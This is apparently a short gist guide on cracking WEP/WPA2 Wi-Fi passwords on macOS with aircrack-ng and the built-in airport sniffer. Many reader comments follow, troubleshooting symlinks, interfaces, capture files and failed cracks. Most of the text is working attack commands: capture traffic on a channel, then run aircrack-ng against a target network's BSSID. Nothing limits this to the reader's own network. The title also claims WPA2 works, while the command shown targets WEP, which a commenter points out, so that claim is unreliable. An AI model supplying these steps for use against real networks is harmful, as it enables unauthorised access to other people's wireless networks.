Cracking WPA2 / WEP Wifi / Aircrack 10 seconds guide. For Mac OSX

Aircrack Commands

//Install Macports.
//Install aircrack-ng:
sudo port install aircrack-ng
//Install the latest Xcode, with the Command Line Tools.
//Create the following symlink:
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport
//Figure out which channel you need to sniff:
sudo airport -s

sudo airport en1 sniff [CHANNEL]
//New Terminal Window
aircrack-ng -1 -a 1 -b [TARGET_MAC_ADDRESS] [CAP_FILE]
// Notes: the cap_file will be located in the /tmp/airportSniff*.cap.

Change symling to:

sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
ref: http://stackoverflow.com/questions/33223457/mac-osx-el-capitan-airport-sym-link-not-permitted

will this actually work with WPA networks? "-a 1" specifies for WEP, and WAP cracking requires dictionaries (-w option)

What if you installed via brew?

brew install aircrack-ng

i didn't got access after step 10 i.e. 11 ,12 and 13 are not applicable
help me pls my mac is showing aircrack-ng command not found after step 12 aircrack-ng -1 -a 1 -b [TARGET_MAC_ADDRESS] [CAP_FILE]

help me pls anybody????

this commands help me @immysam

export PATH=$PATH:/opt/local/bin
export MANPATH=$MANPATH:/opt/local/share/man
export INFOPATH=$INFOPATH:/opt/local/share/info

@immysam check your network interface
$ networksetup listallhardwareports

I am getting this
`
Attack failed. Possible reasons:

 * Out of luck: you must capture more IVs. Usually, 104-bit WEP
   can be cracked with about 80.000 IVs, sometimes more.

 * Try to raise the fudge factor (-f).

Please specify a dictionary (option -w).`

Running sudo airport en1 sniff 1 does not work. Simply displays the help message.

^ +1

Why does it display the commands? I'm not sure to understand

Guys maybe it's because de paramaters aren't correct?

So stupid, I found why it happens.

Based on [THIS LINK], it seems like en1 is the interface of Wireless only when you have an ethernet port. On my MacBook Pro, I don't, so en0 is the only one I have !

sudo airport en0 sniff [CHANNEL]

Hopefully it helps !

How do I add a dictionary? Is Jack the Ripper good enough?

Hello how do I sniff with airport and use aircrack-ng using an Alfa AWUS036AC USB 3.0 adapter on a MacBook Pro? When I type ifconfig in Terminal my USB wifi adapter doesn't show up.

Dear admin,

How to see CAP_FILE? I have try to understand noted: the cap_file will be located in the /tmp/airportSniff*.cap. but don't know how to see them, pls help!

Thanks a lot

(aircrack-ng -1 -a 1 -b [TARGET_MAC_ADDRESS] [CAP_FILE]
// Notes: the cap_file will be located in the /tmp/airportSniff*.cap.

-i got a macbook air and guess i ask my self same thing how to do kali stuff natively on macos why im here

perhaps you already find this
1- http://jason4zhu.blogspot.fr/2014/12/crack-wep-wifi-via-aircrack-ng-in-mac-osx.html
2- https://louisabraham.github.io/articles/WPA-wifi-cracking-MBP.html ( this article Link to your Notes Here ^^)

symlink is not working
NO SUCH FILE OR DIRECTORY

It say : No valid WPA handshakes found.
What can i do ? :(

The command will be:

sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport

airport command not found :/

sudo su -
ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport

Worked for me when I got airport command not found and operation not possible.

i cant find the Cap_File because i have no folder like tmp. can anyone help me pls?

@weltmoasta navigate to /tmp in finder

also make sure youre typing .cap and not .cap. (the extra dot is what threw me)

Mac has built in sniffer for getting handshakes, why airport is needed for that? Also I'm wondering is the aircrack mechanism based on getting handshakes and after try to recover password from hccapx with hashcat?

command not found

what is the target mac address?

mac address is the same as bssid @chovy

can"t find [CAP_FILE]
pls help

$ sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
ln: /usr/local/bin/airport: File exists
$ aircrack-ng -1 -a 1 -b
-bash: aircrack-ng: command not found
$ brew install aircrack-ng
Warning: aircrack-ng 1.4 is already installed, it's just not linked
You can use brew link aircrack-ng to link this version.
$ brew link aircrack-ng
Linking /usr/local/Cellar/aircrack-ng/1.4...
Error: Could not symlink sbin/airbase-ng
/usr/local/sbin is not writable.

what should do,, pls

sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport

says "ln: /usr/sbin/airport: Operation not permitted"

quick google solved it

for anyone w/ the same issue the command is

sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport

MacOS Mojave 10.14.1 failed got the replay "Segmentations Fault 11" message when proceed "airport en0 sniff", anyone got the solution?

MacOS Mojave 10.14.1 failed got the replay "Segmentations Fault 11" message when proceed "airport en0 sniff", anyone got the solution? i'm having the same issue

more easy when i'm installing kali on macbook air, i can scan and crack the handshake more faster beside debugging the OSX ^_^!

MacOS Mojave 10.14.1 failed got the replay "Segmentations Fault 11" message when proceed "airport en0 sniff", anyone got the solution?

The same stuff.

First attempt failed.
➜ Clients airport en0 sniff 4
Could not open device en0 (en0: You don't have permission to capture on that device ((cannot open BPF device) /dev/bpf0: Permission denied)).

Second attempt failed
sudo tcpdump "type mgt subtype beacon and ether src $BSSID" -I -c 1 -i en1 -w beacon.cap
tcpdump: en1: That device doesn't support monitor mode